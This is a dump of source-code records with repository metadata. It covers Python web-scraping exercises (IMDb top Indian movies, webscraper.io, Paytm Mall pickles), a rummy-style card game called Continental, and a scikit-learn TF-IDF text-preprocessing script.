"src_encoding": "UTF-8",
"text": "from ast import dump\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport pprint\nurl=\"https://webscraper.io/test-sites\"\nRes=requests.get(url)\nhtmlcontent=Res.content\nsoup=BeautifulSoup(htmlcontent,\"html.parser\")\ndiv=soup.find('div',class_='container test-sites')\ndiv1=div.find_all('div',class_='col-md-7 pull-right')\ndef e_commerce():\n list1=[]\n s=1\n details={'postion':s,'name':'','link':''}\n for i in range(0,len(div1)):\n details['name']=div1[i].a.get_text().strip()\n\n e_commerce_link=div1[i].a['href']\n details['link']=\"https://webscraper.io\"+e_commerce_link\n list1.append(details)\n s+=1\n details={'postion':s,'name':'','link':''}\n # print(details)\n with open('e_commerce.json','w') as j:\n json.dump(list1,j,indent=5)\n\n return list1\n\npprint.pprint(e_commerce())"
},
{
"alpha_fraction": 0.2514285743236542,
"alphanum_fraction": 0.3199999928474426,
"avg_line_length": 13.272727012634277,
"blob_id": "57e36a63e9bd79f331e8ee5edc135ea6598df702",
"content_id": "d8ffc4d17910a79754367aefe7fa5707960464b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 175,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 11,
"path": "/text ques.py",
"repo_name": "saloni-080601/webscraping",
"src_encoding": "UTF-8",
"text": "i=1\nwhile i<=1000:\n j=1\n f=0\n while i>=j:\n if i%j==0:\n f=f+1\n j+=1\n if f==2:\n print(i,\"it is prime no\")\n i+=1\n\n \n "
},
{
"alpha_fraction": 0.5534433126449585,
"alphanum_fraction": 0.5624103546142578,
"avg_line_length": 28.659574508666992,
"blob_id": "edd39dd0c2ec6314c284363582d15df727104019",
"content_id": "e457e8094eae0ce5ee801315766db9a05e986920",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2788,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 94,
"path": "/ws.py",
"repo_name": "saloni-080601/webscraping",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\nimport json\nimport pprint\nurl=\"https://www.imdb.com/india/top-rated-indian-movies/\"\nRes=requests.get(url)\n\n# print(Res.text)\nhtmlcontent=Res.content\nsoup=BeautifulSoup(htmlcontent,\"html.parser\")\ndef scrab_top_list():\n main_div=soup.find('div', class_='lister')\n tbody=main_div.find('tbody',class_='lister-list')\n trs=tbody.find_all('tr')\n movie_ranks=[]\n movie_name=[]\n year_of_realease=[]\n movie_url=[]\n movie_ratings=[]\n for tr in trs:\n postion=tr.find('td',class_='titleColumn').get_text().strip()\n rank=''\n for i in postion:\n if '.' not in i:\n rank=rank+i\n movie_ranks.append(rank)\n title=tr.find('td',class_='titleColumn' ).a.get_text()\n movie_name.append(title)\n year=tr.find('td',class_=\"titleColumn\").span.get_text()\n year_of_realease.append(year)\n imdb_rating=tr.find('td',class_=\"ratingColumn imdbRating\").strong.get_text()\n movie_ratings.append(imdb_rating)\n link=tr.find('td',class_=\"titleColumn\").a[\"href\"]\n movie_link=\"https://www.imdb.com\" + link\n movie_url.append(movie_link)\n Top_movies = []\n details={'postion':'','name':'','year':'','rating':'','url':''}\n for i in range(0,len(movie_ranks)):\n details['postion']=movie_ranks[i]\n details['name']=str(movie_name[i])\n details['year']=int(year_of_realease[i][1:5])\n details['rating']=float(movie_ratings[i])\n details['url']=movie_url[i]\n Top_movies.append(details)\n details={'postion':'','name':'','year':'','rating':'','url':''}\n with open ('postion.json',\"w\") as u:\n json.dump(Top_movies,u,indent=5) \n return (Top_movies)\n\nscrabbed=(scrab_top_list()) \n\ndef group_of_year(movies):\n \n year=[]\n dict1={}\n for i in movies:\n if i['year'] not in year:\n year.append(i['year'])\n for j in year:\n list1=[]\n for k in movies:\n if j==k['year']:\n list1.append(k)\n dict1.update({j:list1})\n with open ('web.json',\"w\") as u:\n json.dump(dict1,u,indent=5)\n return dict1\n \n\n \ndec=group_of_year(scrabbed)\n\ndef group_of_dec(movies):\n list1=[]\n moviedec={}\n for i in movies:\n some=i%10\n decade=i-some\n if decade not in list1:\n list1.append(decade)\n list1.sort()\n for i in list1:\n moviedec[i]=[]\n for j in moviedec:\n dec1=j+9 \n list2=[] \n for k in movies:\n if k<=dec1 and k>=j:\n for x in movies[k]:\n moviedec[j].append(x)\n with open ('scrab.json',\"w\") as u:\n json.dump(moviedec,u,indent=5)\n return(moviedec)\npprint.pprint(group_of_dec(dec))\n"
},
{
"alpha_fraction": 0.5527479648590088,
"alphanum_fraction": 0.5773847103118896,
"avg_line_length": 30.058822631835938,
"blob_id": "971292306a84b556f2a3cc25862bc04eddf8d4cc",
"content_id": "b48e356ed1e35944aff6655a12707675e73e190b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1583,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 51,
"path": "/pickal.py",
"repo_name": "saloni-080601/webscraping",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\nimport json\nimport pprint\n\ndef scrab_top_list():\n url1=\"https://paytmmall.com/shop/search?q=pickles&from=organic&child_site_id=6&site_id=2&category=101471\"\n page=requests.get(url1)\n soup=BeautifulSoup(page.text,'html.parser')\n div=soup.find('div',class_='_1gX7').span.get_text()\n \n var=int(div[1:5])\n \n var1=var//2\n print(var1)\n i=0\n pical_list=[]\n postion=1\n details={'postion':postion,'name':'','rate':'','link':''}\n while i<var1:\n url=\"https://paytmmall.com/shop/search?q=pickles&from=organic&child_site_id=6&site_id=2&category=101471&page=\"+str(i)\n Res=requests.get(url)\n htmlcontent=Res.content\n soup=BeautifulSoup(htmlcontent,\"html.parser\")\n main_div=soup.find(\"div\",class_=\"_3RA-\")\n main_div1=main_div.find_all(\"div\",class_=\"UGUy\")\n rate_div=soup.find_all('div',class_='_1kMS')\n # print(rate_div)\n url_div=soup.find_all('div',class_='_3WhJ')\n\n for j in range(0,len(main_div1)):\n \n details['name']=main_div1[j].get_text()\n details['rate']=rate_div[j].span.get_text()\n pikal_url=url_div[j].a['href']\n\n details['link']=\"https://paytmmall.com\"+pikal_url\n pical_list.append(details)\n \n\n details={'postion':postion,'name':'','rate':'','link':''}\n \n postion+=1\n i+=1\n\n continue\n\n with open('basic.json','w') as h:\n json.dump(pical_list,h,indent=5)\n \npprint.pprint(scrab_top_list())"
}
] | 4 |
tszming/tailon
|
https://github.com/tszming/tailon
|
a7963cba3d61959f25817833685fc387b7ed7963
|
4f372799d3e261b7fd88e76afe6d111bb9e5919c
|
162233d14d324bba506697636fbac95a70ce4579
|
refs/heads/master
| 2021-01-17T22:55:50.199775 | 2014-06-30T08:17:37 | 2014-06-30T08:17:37 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4935145080089569,
"alphanum_fraction": 0.5033971667289734,
"avg_line_length": 32.04081726074219,
"blob_id": "3ea9ad2d06bea94d30ddfdfc2eeaf287b08b8f56",
"content_id": "0eab742edd657cbeb60154c5957ba58e3b3cc34e",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1619,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 49,
"path": "/setup.py",
"repo_name": "tszming/tailon",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# encoding: utf-8\n\nfrom tailon import version\nfrom os.path import abspath, dirname, join\nfrom setuptools import setup\n\nclassifiers = (\n 'Development Status :: 4 - Beta',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'License :: OSI Approved :: BSD License',\n 'Intended Audience :: Developers',\n 'Operating System :: POSIX :: Linux',\n)\n\nkw = {\n 'name' : 'tailon',\n 'version' : version,\n 'description' : 'Webapp for looking at and searching through log files',\n 'long_description' : open(join(abspath(dirname(__file__)), 'README.rst')).read(),\n 'author' : 'Georgi Valkov',\n 'author_email' : '[email protected]',\n 'license' : 'Revised BSD License',\n 'url' : 'https://github.com/gvalkov/tailon',\n 'keywords' : 'log monitoring tail',\n 'classifiers' : classifiers,\n 'packages' : ['tailon'],\n 'install_requires' : [\n 'tornado>=3.2.0',\n 'sockjs-tornado==1.0.0',\n 'PyYAML>=3.10'],\n 'entry_points' : {'console_scripts': ['tailon = tailon.main:main']},\n 'zip_safe' : False,\n 'package_data' : {\n 'tailon' : ['../assets/js/vendor/*',\n '../assets/js/main.js',\n '../assets/css/*',\n '../assets/favicon.ico',\n '../assets/fonts/*',\n '../templates/*',\n ]\n },\n 'include_package_data': False,\n}\n\nif __name__ == '__main__':\n setup(**kw)\n"
}
] | 1 |
srodewal/CSE294_HW4
|
https://github.com/srodewal/CSE294_HW4
|
a148bc3d0dcfeb8ec583d04269b752c29af385bf
|
6fb3a44ae0b500e5e5edaeb982a72003d0364c4f
|
9d0928d7afb5626b0c275a2bcd98cf627dd567a2
|
refs/heads/master
| 2016-04-16T05:58:21.671891 | 2016-02-29T21:49:03 | 2016-02-29T21:49:03 | 52,827,346 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5879611372947693,
"alphanum_fraction": 0.6019417643547058,
"avg_line_length": 31.1875,
"blob_id": "fac04e32cda6ddc03c665ff70f10caa4c97bfa96",
"content_id": "0e9f34ac4065bea4a4466b17b8020366a2a4d184",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2575,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 80,
"path": "/magic_nxn.py",
"repo_name": "srodewal/CSE294_HW4",
"src_encoding": "UTF-8",
"text": "# Implementation of Pseudocode Written by Spencer\n\nimport math\n\ndef create_magic_square_nxn(n):\n magicSquare = [[0 for row in range(0,n)] for col in range(0,n)] # create n by n array of 0's\n currRowSpace = 0\n currColSpace = int(math.floor(n/2))\n magicSquare[currRowSpace][currColSpace] = 1\n #squaredN = n*n\n for i in range(2,n*n+1):\n nextRowSpace = (currRowSpace-1)%n\n nextColSpace = (currColSpace+1)%n\n if magicSquare[nextRowSpace][nextColSpace] != 0:\n nextRowSpace = (currRowSpace+1)%n\n nextColSpace = currColSpace\n magicSquare[nextRowSpace][nextColSpace] = i\n currRowSpace = nextRowSpace\n currColSpace = nextColSpace\n return magicSquare\n\ndef output_magic_square_nxn(magicSquare, n):\n rowSum, isCorrect = compute_Row_Sum(magicSquare, n)\n colSum, isCorrect = compute_Column_Sum(magicSquare, n)\n diagSum, isCorrect = compute_Diagonal_Sum(magicSquare, n)\n for row in range(0,n):\n for col in range(0,n):\n print(\"%4d\" % magicSquare[row][col]),\n print(\" \"),\n #print(str(magicSquare[row][col]) + \" \"),\n print(\" \")\n print(\"Row sum is: %d\" % rowSum)\n print(\"Column sum is: %d\" % colSum)\n print(\"Diagonal sum is: %d\" % diagSum)\n\ndef compute_Row_Sum(magicSquare, n):\n rowSum = 0\n isEqual = True\n for row in range(0,n):\n if rowSum is 0:\n rowSum = sum(magicSquare[row])\n else:\n if sum(magicSquare[row]) != rowSum:\n isEqual = False\n rowSum = -1\n return (rowSum, isEqual)\n\ndef compute_Column_Sum(magicSquare, n):\n columnSums = [0 for col in range(0,n)]\n colSum = 0\n isEqual = True\n for i in range(0,n):\n for j in range(0,n):\n columnSums[j] += magicSquare[i][j]\n colSum = columnSums[0] # if all equal will return this\n if n != 1:\n for spot in range(0, n-1):\n if columnSums[spot] != columnSums[spot+1]:\n isEqual = False\n colSum = -1\n return (colSum, isEqual)\n\ndef compute_Diagonal_Sum(magicSquare, n):\n sumFirstDiagonal = 0\n sumSecondDiagonal = 0\n for i in range(0,n):\n sumFirstDiagonal += magicSquare[i][i]\n sumSecondDiagonal += magicSquare[i][n-i-1]\n if sumFirstDiagonal == sumSecondDiagonal:\n return (sumFirstDiagonal, True)\n else:\n return (-1, False)\n\ndef main():\n print(\"Please enter n: \")\n size = int(raw_input())\n magicSquare = create_magic_square_nxn(size)\n output_magic_square_nxn(magicSquare, size)\n\nmain()\n"
}
] | 1 |
williamwaffles/IS211_Assignment3
|
https://github.com/williamwaffles/IS211_Assignment3
|
8625dbc1d39ec3b45a90493b6b0ae71a9bbf296d
|
7ded2218848a4ca7b9ae5127d9a577fd2c7eb2e9
|
2ea3ecb154ca04cbfa36c7bc58c3a1304bfe0560
|
refs/heads/main
| 2023-08-06T19:37:55.651013 | 2021-09-22T13:34:52 | 2021-09-22T13:34:52 | 406,927,619 | 0 | 1 | null | 2021-09-15T21:18:34 | 2020-10-26T02:28:54 | 2020-10-26T02:28:52 | null |
[
{
"alpha_fraction": 0.6315789222717285,
"alphanum_fraction": 0.8421052694320679,
"avg_line_length": 18,
"blob_id": "f3f963b4f275698f368a638466f19c6272552286",
"content_id": "fa6ee3e641c83db0e41b0eb2a57371925477d1d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 2,
"path": "/README.md",
"repo_name": "williamwaffles/IS211_Assignment3",
"src_encoding": "UTF-8",
"text": "# IS211_Assignment3\nIS211_Assignment3\n"
},
{
"alpha_fraction": 0.6013234257698059,
"alphanum_fraction": 0.6137303709983826,
"avg_line_length": 34.485294342041016,
"blob_id": "6a9e7e6ab6691960c4d2296f48d8bcc0bb1921ca",
"content_id": "8e3caf40288ca281dafc32b0512417cd7653d99c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2418,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 68,
"path": "/assignment3.py",
"repo_name": "williamwaffles/IS211_Assignment3",
"src_encoding": "UTF-8",
"text": "import argparse\nimport re\nimport csv\nimport urllib.request\n\nfile_url = ('http://s3.amazonaws.com/cuny-is211-spring2015/weblog.csv')\n\ndef downloadData(url): # Part I/II - Pulls and processes csv file\n\n fetch_url = urllib.request.urlopen(url)\n data = fetch_url.read().decode('utf-8')\n file = data.splitlines()\n file_reader = csv.reader(file)\n csv_list = (list(file_reader))\n return csv_list\n\ndef processImgData(file): # Part III - Search csv for image type hits\n\n img_hits = 0\n row_count = 0\n\n for line in file:\n print(line[0])\n row_count += 1\n img_search = re.search(r'jpg|gif|png', line[0], re.IGNORECASE) # check for .jpg, .gif, .png\n if img_search:\n img_hits += 1\n\n img_percentage = (img_hits / row_count) * 100\n # prints out image requests, total requests, and percentage of requests that were for image files\n print(f'There are a total of {img_hits} image requests in this file.')\n print(f'There are a total of {row_count} requests in this file.')\n print(f'Image requests account for {img_percentage}% of all requests!')\n\ndef popularBrowser(file): # Counts the browsers used to access files, finds most popular\n\n browser = { 'Firefox' : 0,\n 'Chrome' : 0,\n 'Internet Explorer' : 0,\n 'Safari' : 0}\n\n for line in file:\n if re.search('Firefox', line[2]):\n browser['Firefox'] += 1\n elif re.search('Chrome', line[2]):\n browser['Chrome'] += 1\n elif re.search('Safari', line[2]):\n browser['Safari'] += 1\n elif re.search('Windows NT|MSIE', line[2]):\n browser['Internet Explorer'] += 1\n\n pop_browser = max(browser, key=browser.get) # finds most popular browser by key\n browser_count = browser.values()\n max_value = max(browser_count) # most popular browser by value\n print(f'The most popular browser is {pop_browser} with {max_value} users!')\n\ndef main(url):\n print(f\"Running main with URL = {url}...\")\n #print(downloadData(file_url))\n processImgData(downloadData(file_url))\n popularBrowser(downloadData(file_url))\n\nif __name__ == \"__main__\":\n \"\"\"Main entry point\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--url\", help=\"URL to the datafile\", type=str, required=True)\n args = parser.parse_args()\n main(args.url)\n \n"
}
] | 2 |
Frank-Triolo/Continental_Game
|
https://github.com/Frank-Triolo/Continental_Game
|
e44bff1bb69e3078adc1d3db027fe045f3ecd7a1
|
85dc9a4c5dec4cc3c70a786a9921eea87c4cb612
|
b4c8147e6ec20be8286c51d19431cf73e2c95b25
|
refs/heads/master
| 2023-01-01T23:45:33.002599 | 2020-10-18T21:53:29 | 2020-10-18T21:53:29 | 305,202,913 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5243351459503174,
"alphanum_fraction": 0.5651446580886841,
"avg_line_length": 19.47945213317871,
"blob_id": "73c1a011675bc4c1d5fe58a42e5a8e51492f44dc",
"content_id": "b37d193cca02e94ad1c91b7dfdac09446e8bacdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5979,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 292,
"path": "/main.py",
"repo_name": "Frank-Triolo/Continental_Game",
"src_encoding": "UTF-8",
"text": "import random\nfrom random import shuffle\nfrom itertools import combinations\nimport time\n\nFinal = []\nfor line in open(\"outfile.txt\",'r'):\n Final.append(int(line.strip()))\n\ndef list_prod(L):\n p = 1\n for x in L:\n p *= x\n return p\n\ndef calculate_done(prod,possible):\n #print(prod)\n ret = False\n if prod == 1:\n print(\"Valid hand!\")\n return True\n for melds in possible:\n if prod%melds == 0:\n ret = calculate_done(prod//melds,possible)\n if ret == True:\n return True\n #print(ret)\n #print(\"Not Valid Hand\")\n return False\n\n\nclass Card:\n def __init__(self, name, suit):\n self.name = str(name)\n self.suit = suit\n self.hidden = 0\n try:\n if int(name) <= 10:\n self.val = int(name)\n except:\n if name == \"King\" or name == \"Queen\" or name == \"Jack\":\n self.val = 10\n elif name == \"Joker\":\n self.val = 0\n else:\n self.val = 15\n def __str__(self):\n return self.name + \" of \" + self.suit + \": \" + str(self.hidden)\n def set_hidden(self,n):\n self.hidden = int(n)\n\nclass Deck:\n def __init__(self):\n self.cards = []\n\n def add_card(self, card_input):\n self.cards.append(card_input)\n \n def remove_card(self):\n return self.cards.pop(0)\n\n def clear(self):\n self.cards = []\n \n def __str__(self):\n return str(len(self.cards))\n\n def shuffle(self):\n shuffle(self.cards)\n\nclass Pile:\n def __init__(self):\n self.cards = []\n \n def remove_card(self):\n return self.cards.pop(-1)\n \n def clear(self):\n self.cards = []\n \n def add_card(self,c):\n self.cards.append(c)\n \n def __str__(self):\n return str(self.cards[-1])\n\nclass Player:\n def __init__(self):\n self.hand = []\n self.points = 0\n self.complete = False\n self.score = 0\n self.hidden = []\n \n def take_from_deck(self, d):\n c = d.remove_card()\n self.hand.append(c)\n self.points += c.val\n self.hidden.append(c.hidden)\n\n def take_from_pile(self, p):\n c = p.remove_card()\n self.hand.append(c)\n self.hidden.append(c.hidden)\n self.points += c.val\n \n def throw_rand(self,p):\n c = random.choice(self.hand)\n self.hand.remove(c)\n self.hidden.remove(c.hidden)\n self.points -= c.val\n p.add_card(c)\n \n def throw_card(self, c, p):\n self.hand.remove(c)\n self.hidden.remove(c.hidden)\n self.points -= c.val\n p.add_card(c)\n\n def throw_by_hidden(self,n,p):\n for c in self.hand:\n print(c.hidden)\n if c.hidden == n:\n self.hand.remove(c)\n self.hidden.remove(c.hidden)\n self.points -= c.val\n p.add_card(c)\n return\n\n def __len__(self):\n return len(self.hand)\n \n def is_complete(self): \n all_combos = combinations(self.hidden, 10)\n\n for combo in all_combos:\n l_p = list_prod(combo)\n print(l_p)\n if calculate_done(l_p,Final) == True:\n return True\n return False\n \n def __str__(self):\n l = []\n for c in self.hand:\n l.append(str(c))\n l.append('\\n')\n return '\\n'.join(l)\n\nP = [ # Products-To-Be\n [241,\"Hearts\",\"Diamonds\",\"Spades\",\"Clubs\"],\n [0,41,101,167,239],\n ['2',2,43,103,173],\n ['3',3,47,107,179],\n ['4',5,53,109,181],\n ['5',7,59,113,191],\n ['6',11,\t61,\t127,\t193],\n ['7',13,\t67,\t131,\t197],\n ['8',17,\t71,\t137,\t199], \n ['9',19,\t73,\t139,\t211],\n ['10',23,\t79,\t149,\t223],\n ['J',29,\t83,\t151,\t227],\n ['Q',31,\t89,\t157,\t229],\n ['K',37,\t97,\t163,\t233],\n ['A',41,\t101,\t167,\t239]\n]\n\nCard_Pile = Pile()\nCard_Deck = Deck()\nP1 = Player()\nP2 = Player()\n\ndef Make_Round(round_number): \n for i in range(2):\n All_Vals = list(range(2,11,1))\n All_Vals += [\"Jack\",\"Queen\",\"King\",\"Ace\"]\n All_Suits = [\"Hearts\",\"Diamonds\",\"Spades\",\"Clubs\"]\n for val in range(len(All_Vals)):\n for suit in range(len(All_Suits)):\n c = Card(str(All_Vals[val]),All_Suits[suit])\n c.set_hidden(P[val+2][suit+1])\n #print(c)\n Card_Deck.add_card(c)\n Card_Deck.shuffle()\n\n for i in range(10):\n P1.take_from_deck(Card_Deck)\n P2.take_from_deck(Card_Deck)\n #print(len(P1))\n P1.take_from_deck(Card_Deck)\n P1.throw_rand(Card_Pile)\n '''\n if round_number % 2 == 0:\n P1.take_from_deck(Card_Deck)\n else:\n P2.take_from_deck(Card_Deck)\n '''\n\n\ndef Clear_Round():\n Card_Deck.clear()\n Card_Pile.clear()\n\nt1 = time.time()\n\nround_num = 0\nturn = 0\n\nMake_Round(round_num)\n\ndone = False\n\nwhile (not done):\n \n if turn == 0:\n if round_num %2 == 0:\n P1.take_from_deck(Card_Deck)\n print(P1)\n done = P1.is_complete()\n h = int(input(\"Input hidden to remove: \"))\n P1.throw_by_hidden(h,Card_Pile)\n turn += 1\n continue\n else:\n P2.take_from_deck(Card_Deck)\n print(P2)\n done = P2.is_complete()\n P1.throw_rand(Card_Pile)\n turn += 1\n continue\n print()\n ran = random.random()\n if turn%2 == 0:\n print(len(P1))\n print(P1)\n print(Card_Pile)\n take = input(\"Input Pile (p) or Deck (d): \")\n \n if take.lower() == 'p':\n P1.take_from_pile(Card_Pile)\n else:\n P1.take_from_deck(Card_Deck)\n #which to take from?\n print(len(P1))\n print(P1)\n \n done = P1.is_complete() # This should be done before the throw\n if done == True:\n break\n\n h = int(input(\"Input hidden to remove: \"))\n P1.throw_by_hidden(h,Card_Pile)\n\n '''\n if ran > 0.5:\n P1.take_from_deck(Card_Deck)\n else:\n P1.take_from_deck(Card_Pile)\n done = P1.is_complete()\n if done == False:\n P1.throw_rand(Card_Pile)\n '''\n else:\n if ran > 0.5:\n P2.take_from_deck(Card_Deck)\n else:\n P2.take_from_pile(Card_Pile)\n done = P2.is_complete()\n if done == False:\n P2.throw_rand(Card_Pile)\n\n turn += 1\n\nprint(turn)\n\nt2 = time.time()\n\nprint(str(t2-t1))\n\n'''\nwhile (P1.score < 100 and P2.score < 100):\n Card_Deck.clear()\n Card_Pile.clear()\n for val in All_Vals:\n for suit in All_Suits:\n c = Card(val,suit)\n Card_Deck.add_card(c)\n\n while (P1.complete == False and P2.complete == False):\n break\n P1.score += P1.points\n'''"
},
{
"alpha_fraction": 0.5019920468330383,
"alphanum_fraction": 0.525896430015564,
"avg_line_length": 24.100000381469727,
"blob_id": "eb9a3e3e2460976ee164ddb5e4df8cb91f04c893",
"content_id": "5c5f8d0f36754c8d123c42a3665def5c48964253",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 10,
"path": "/Card_Class.py",
"repo_name": "Frank-Triolo/Continental_Game",
"src_encoding": "UTF-8",
"text": "class Card:\n def __init__(self, name, suit):\n self.name = name\n self.suit = suit\n if int(name) <= 10:\n self.val = int(name)\n elif name == \"King\" or name == \"Queen\" or name == \"Jack\":\n self.val = 10\n else:\n self.val = 15\n"
},
{
"alpha_fraction": 0.5866900086402893,
"alphanum_fraction": 0.5901926159858704,
"avg_line_length": 20.923076629638672,
"blob_id": "8ef474cf93a877bcab82e78357dc30b3dbd991fe",
"content_id": "41398b819444fc8b5441d8b3f68303ddb5de3c98",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 571,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 26,
"path": "/Player.py",
"repo_name": "Frank-Triolo/Continental_Game",
"src_encoding": "UTF-8",
"text": "class Player:\n def __init__(self):\n self.hand = []\n self.points = 0\n self.complete = False\n self.score = 0\n \n def take_from_deck(self, d):\n c = d.remove_card()\n self.hand.append(c)\n self.points += c.val\n\n def take_from_pile(self, p):\n c = p.remove_card()\n self.hand.append(c)\n self.points += c.val\n \n def throw_card(self, c, p):\n self.hand.remove(c)\n self.points -= c.val\n p.add_card(c)\n \n def is_complete(self): \n done = False\n # Write checking code to determine whether hand is complete\n self.complete = done\n\n"
},
{
"alpha_fraction": 0.6166666746139526,
"alphanum_fraction": 0.6222222447395325,
"avg_line_length": 19,
"blob_id": "a1c029d01f8bc954d9e9ff49fdda48d61400c5b6",
"content_id": "211b5261036a88f7717690ca0a77b5cc1c01b35e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 180,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 9,
"path": "/Deck.py",
"repo_name": "Frank-Triolo/Continental_Game",
"src_encoding": "UTF-8",
"text": "class Deck:\n def __init__(self):\n self.cards = []\n\n def add_card(self, card_input):\n self.cards.append(card_input)\n \n def remove_card(self):\n return self.cards.pop(0)\n"
},
{
"alpha_fraction": 0.7696969509124756,
"alphanum_fraction": 0.7848485112190247,
"avg_line_length": 35.66666793823242,
"blob_id": "0c067f0ad02309d3862389df762d1ade967563a6",
"content_id": "aa32c97c04b964cfa1d9eafadb90847b3aca7214",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 330,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 9,
"path": "/README.txt",
"repo_name": "Frank-Triolo/Continental_Game",
"src_encoding": "UTF-8",
"text": "# Continental_Game\nImplementation of Continental Game\n\nThis game is a 10-card rummy variant in which 3 cards are needed to make a valid meld/set.\n\nBy assigning each card to a prime number, we can calculate all of the different possible hand types that can result in a complete 10-card hand.\n\nTO-DO:\n Implement AI to play against\n"
}
] | 5 |
chao665190/Some_Course_Projects
|
https://github.com/chao665190/Some_Course_Projects
|
5c660702a7eff836426ea7460b0591ffa903fa89
|
ade53d7b6557ea16a4ae15122b90f3cfaf93240c
|
53194313cafaa396c7c0afc4de355756d733f0ba
|
refs/heads/master
| 2022-11-14T04:08:29.182597 | 2022-01-01T01:53:00 | 2022-01-01T01:53:00 | 277,912,948 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6861076354980469,
"alphanum_fraction": 0.7018773555755615,
"avg_line_length": 41.4361686706543,
"blob_id": "9ca3fff5a3d9372494ee47e63e219cbc72e5bd20",
"content_id": "4b601ed8c17de09191a54d47a2e5bcd659c2dbf1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3998,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 94,
"path": "/text_preprocess_and_TF_x _IDF.py",
"repo_name": "chao665190/Some_Course_Projects",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nfrom nltk.stem.snowball import SnowballStemmer\nfrom sklearn.feature_extraction import text\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\nimport numpy as np\nimport random\n\n\n\ndata = []\nletter = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\"]\nmin_df = 2 # if a word emerges in less than 2 doc, than, not be considered\nmax_df = 0.7 #float,percentage\nlowercase = True # could change\n\nfor i in range(1,101):\n\tpadnumber = '{:04d}'.format(i) #000x\n\tfor fileletter in letter:\n\t\tfile = open(\"/Users/chaowang/Desktop/Descubrimiento_De_Información_En_Textos/7/BankSearch-reduced/{}{}.txt\".format(fileletter,padnumber), encoding='cp1252')\n\t\tmystr = file.read()\n\t\t# index = mystr.find(\"<html>\") #extract text from HTML\n\t\t# mystr = mystr[index:]\n\t\t# soup = BeautifulSoup(mystr, 'html.parser')#parse a html file, analisis as html file\n\t\tt = mystr # soup.get_text()\n\t\tdata.append((t, fileletter))#reprepare for shuffle\t# every element is a tuple\n\nrandom.shuffle(data)\nprint('Num of doc: ',len(data)) # for verification\ntrain_data = ([], [])#(texts, classes)\t#[0],[1]\t#tuple\t# every element is a list\ntest_data = ([], [])\nfor i in range(1000):\n\tif i < 700:\n\t\ttrain_data[0].append(data[i][0])\n\t\ttrain_data[1].append(data[i][1])\n\telse:\n\t\ttest_data[0].append(data[i][0])\n\t\ttest_data[1].append(data[i][1])\n\nprint('Num of doc: ',len(train_data[0])) # for verification\nprint('Num of doc: ',len(test_data[0]))\n\n\ndef Stemmer(Data):\n for i in range(len(Data)):\n Data[i] = ' '.join(map(SnowballStemmer('english').stem, CountVectorizer().build_analyzer()(Data[i]))) # to stem every word\n\ndef Counter(train, test):\n Stemmer(train)\n Stemmer(test)\n #Convert a collection of text documents to a matrix of token counts:\n count_vect = CountVectorizer(max_df=max_df, min_df=min_df, lowercase=lowercase, stop_words=text.ENGLISH_STOP_WORDS) ## sklearn stopwords\n X_train_counts = count_vect.fit_transform(train)\n print('Shape of train =',X_train_counts.shape)\n X_test_counts = count_vect.transform(test)\n print('Shape of test =',X_test_counts.shape) # builds vectors\n # the same vocabulary\n print(count_vect.get_feature_names()[1947]) # 1947 for verfication: what is the 1974 attribute word in the metrix\n return X_train_counts, X_test_counts, count_vect.get_feature_names()\n\ntrain_counts, test_counts, vocabulary = Counter(train_data[0], test_data[0]) # text converts to metrix\n\nfrom sklearn.feature_extraction.text import TfidfTransformer # convert a count metrix to tfidf metrix\ndef tfidf(X_train_counts, X_test_counts):\n tfidf_transformer = TfidfTransformer()\n X_train_tfidf = tfidf_transformer.fit_transform(X_train_counts) #fit to data, then transform it. (find a funtion that suits those datas)\n X_test_tfidf = tfidf_transformer.transform(X_test_counts)\n print(X_train_tfidf.shape)\n print(X_test_tfidf.shape)\n return X_train_tfidf, 